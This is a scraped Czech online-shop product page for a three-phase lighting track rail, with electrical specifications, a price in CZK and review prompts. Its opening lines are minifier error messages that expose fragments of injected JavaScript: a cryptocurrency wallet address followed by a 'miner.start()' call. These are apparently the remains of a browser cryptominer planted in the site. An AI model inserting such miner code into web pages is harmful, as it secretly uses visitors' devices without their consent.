JSMin: Unterminated String at byte 148: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();JSMin: Unterminated String at byte 160: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();/* */Track lišta 3 fázová

Vítejte

Track lišta 3 fázová

0 Recenze

Dostupnost: Na objednávku, dodaci lhůta 3-4 týdny

TL3F

Více informací Komentáře

3 fázová lišta je navržena pro snadnou instalaci řešení osvětlení. Lišta je vyrobena ze slitiny extrudovaného hliníku tři okruhy jsou zcela izolované, trať pro svítidla je možné vytvotiť pomocí spojovacích konektorů do různých tvarů. Konstrukci lze připevnit přímo k pevnému podkladu přes předvrtané montážní otvory v liště, nebo zavěsit pomocí závěsných prvků. Bezpečně odizolována sběrnice osazena v plastovém pouzdře, zabezpečuje 4 vodiče bezpečně odizolovány po celou dobu životnosti výrobku.Pre správné fungování osvětlení na trati třeba používat kompaktibilní napájecí adaptéry.4 okruhy individuálně ovladatelné na 16 Amper., 240 voltů 60 Hz na trati. Tří okruhová lišta pro vytvoření flexibilního systému konfigurace osvětlovací sústavy.Je určená profesionální uživatele, umožňuje, aby požadovaná dráha pro osvětlovací soustavu byla vytvořena poměrně jednoduše. Všechna svítidla v osvětlovací soustavě mají samostatné napájení v rámci drahy se mohou jednoduše přesouvat a vytvořit například měnící se atmosféry ve výkladních skříních nebo interiérech.Takto můžeme vytvořit zvýrazňující osvětlení, jakož i nasvětlení reklam a dekorativních materiálů. K dispozici je  řada  napáječů, adaptérů, a montážního příslušenství.

Tři samostatné obvody 250 V AC, 16 A, 3 x 3,7 kVA (celkový příkon)
Je možné připojit i 3-fázové napájení (230 - 400 V 16 A), čímž dosáhneme trojnásobný nárůst jmenovitého výkonu tj. 11.1 kW Dodávané s upevňovacími otvory (vzdálenost 1000 mm, zátěž max.. 5 x 5 kg, točivý moment 2.5 Nm)

 

Napište svůj názor

Track lišta 3 fázová

Track lišta 3 fázová

Track lišta 3 fázová pro LED svítidla na ukotvení na strop nebo na stenu

Napište svůj názor

CZK 544,50

plus1

» Přidat do mého seznamu přání

  • Remove this product from my favorites
  • Add this product to my favorites
  • Tento výrobek není prodáván samostatně. Musíte vybrat alespoň 5 množství tohoto produktu.